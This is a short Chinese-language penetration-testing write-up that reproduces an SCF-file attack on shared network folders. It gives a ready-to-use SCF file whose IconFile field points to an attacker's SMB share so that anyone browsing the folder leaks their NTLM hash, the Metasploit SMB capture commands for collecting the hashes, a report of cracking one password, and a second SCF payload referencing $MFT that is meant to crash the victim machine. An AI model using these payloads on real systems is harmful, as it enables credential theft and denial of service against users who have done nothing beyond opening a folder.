通过学习看雪一篇文章对SCF文件利用攻击网络共享文件夹,由于原文有些地方没有提及,于是便尝试了一下复现,个人认为在内网渗透中某些技巧灵活运用起来能事半功倍,多学习一种新方式,就可能多一种新思路
1. 通过创建SCF文件指向攻击者ip
2. 创建共享文件夹放入SCF文件并设置权限为公共访问
3. 浏览或上传文件到目标系统成功获取到用户系统HASH
通过创建SCF文件,修改其中地址为攻击者ip
[Shell]Command=2
IconFile=\\192.168.1.214\share\test.ico
[Taskbar]
Command=ToggleDesktop
创建共享文件夹并设置权限
监听smb服务
use auxiliary/server/capture/smb
设置HASH密码保存地址
set JOHNPWFILE xxxxx
通过浏览文件夹成功获取到用户系统密码
得到访问者电脑系统密码
第一列为用户密码,第二列为系统用户登录名
由此成功破解密码为aasron
提示:
1.攻击目标死机SCF文件,根据原文解释无需攻击者或被攻击者操作
[Shell]Command=2
IconFile= c:\$MFT\123
[Taskbar]
Command=ToggleDesktop
2.如果指定攻击某台系统需要对方开启写入权限并写入文件、否则则要使用本机上传SCF文件并诱使被攻击者访问